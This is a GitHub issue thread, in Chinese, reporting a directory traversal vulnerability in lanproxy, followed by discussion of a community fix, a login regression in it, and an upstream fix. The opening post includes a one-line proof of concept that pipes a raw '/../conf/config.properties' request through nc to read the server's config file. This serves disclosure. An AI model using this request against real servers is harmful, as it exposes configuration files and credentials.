lanproxy icon indicating copy to clipboard operation
lanproxy copied to clipboard

Published 20 hours ago verified publisher icon ffay

目录遍历漏洞似乎并未修复

Open Elrori opened this issue 3 years ago • 8 comments

get到web端口某目录,可以遍历任意文件。 例如运行: echo -e "GET /../conf/config.properties HTTP/1.1\r\nHost: localhost:80\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6\r\n\r\n" | nc x.x.x.x xxx

Elrori avatar Feb 26 '21 12:02 Elrori

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

hailinz avatar Apr 11 '21 14:04 hailinz

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

你这个貌似登录不了后台了。。。(本地ip:端口)

ErDongChen1973 avatar May 28 '21 03:05 ErDongChen1973

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

你这个貌似登录不了后台了。。。(本地ip:端口)

哈哈哈,失误失误,我配的有域名,急的修bug,回头我看一下

hailinz avatar May 28 '21 07:05 hailinz

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

你这个貌似登录不了后台了。。。(本地ip:端口)

哈哈哈,失误失误,我配的有域名,急的修bug,回头我看一下

大佬,有时间更新一下呢?

ErDongChen1973 avatar Jun 05 '21 12:06 ErDongChen1973

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

你这个貌似登录不了后台了。。。(本地ip:端口)

哈哈哈,失误失误,我配的有域名,急的修bug,回头我看一下

大佬,有时间更新一下呢?

我按照【fix:目录遍历漏洞】重新编译了,开启服务器,输入127.0.0.1:8090 显示203 Non-Authoritative Information 请问是什么意思呢?

ErDongChen1973 avatar Aug 16 '21 12:08 ErDongChen1973

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

你这个貌似登录不了后台了。。。(本地ip:端口)

哈哈哈,失误失误,我配的有域名,急的修bug,回头我看一下

大佬,有时间更新一下呢?

我按照【fix:目录遍历漏洞】重新编译了,开启服务器,输入127.0.0.1:8090 显示203 Non-Authoritative Information 请问是什么意思呢?

哎呀呀,实在抱歉, 最近忙的这事一直没顾上, 已修复,我这试了已经可以正常登录了

hailinz avatar Sep 09 '21 05:09 hailinz

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

你这个貌似登录不了后台了。。。(本地ip:端口)

哈哈哈,失误失误,我配的有域名,急的修bug,回头我看一下

大佬,有时间更新一下呢?

我按照【fix:目录遍历漏洞】重新编译了,开启服务器,输入127.0.0.1:8090 显示203 Non-Authoritative Information 请问是什么意思呢?

刚看了下,作者也修复了

hailinz avatar Sep 09 '21 05:09 hailinz

官方不修只能自己来了, 我才知道这个bug,吓死了,找了一圈赶紧自己修了得了, https://github.com/hailinz/lanproxy

你这个貌似登录不了后台了。。。(本地ip:端口)

哈哈哈,失误失误,我配的有域名,急的修bug,回头我看一下

大佬,有时间更新一下呢?

我按照【fix:目录遍历漏洞】重新编译了,开启服务器,输入127.0.0.1:8090 显示203 Non-Authoritative Information 请问是什么意思呢?

刚看了下,作者也修复了

多谢,我也很久没看了

ErDongChen1973 avatar Sep 09 '21 07:09 ErDongChen1973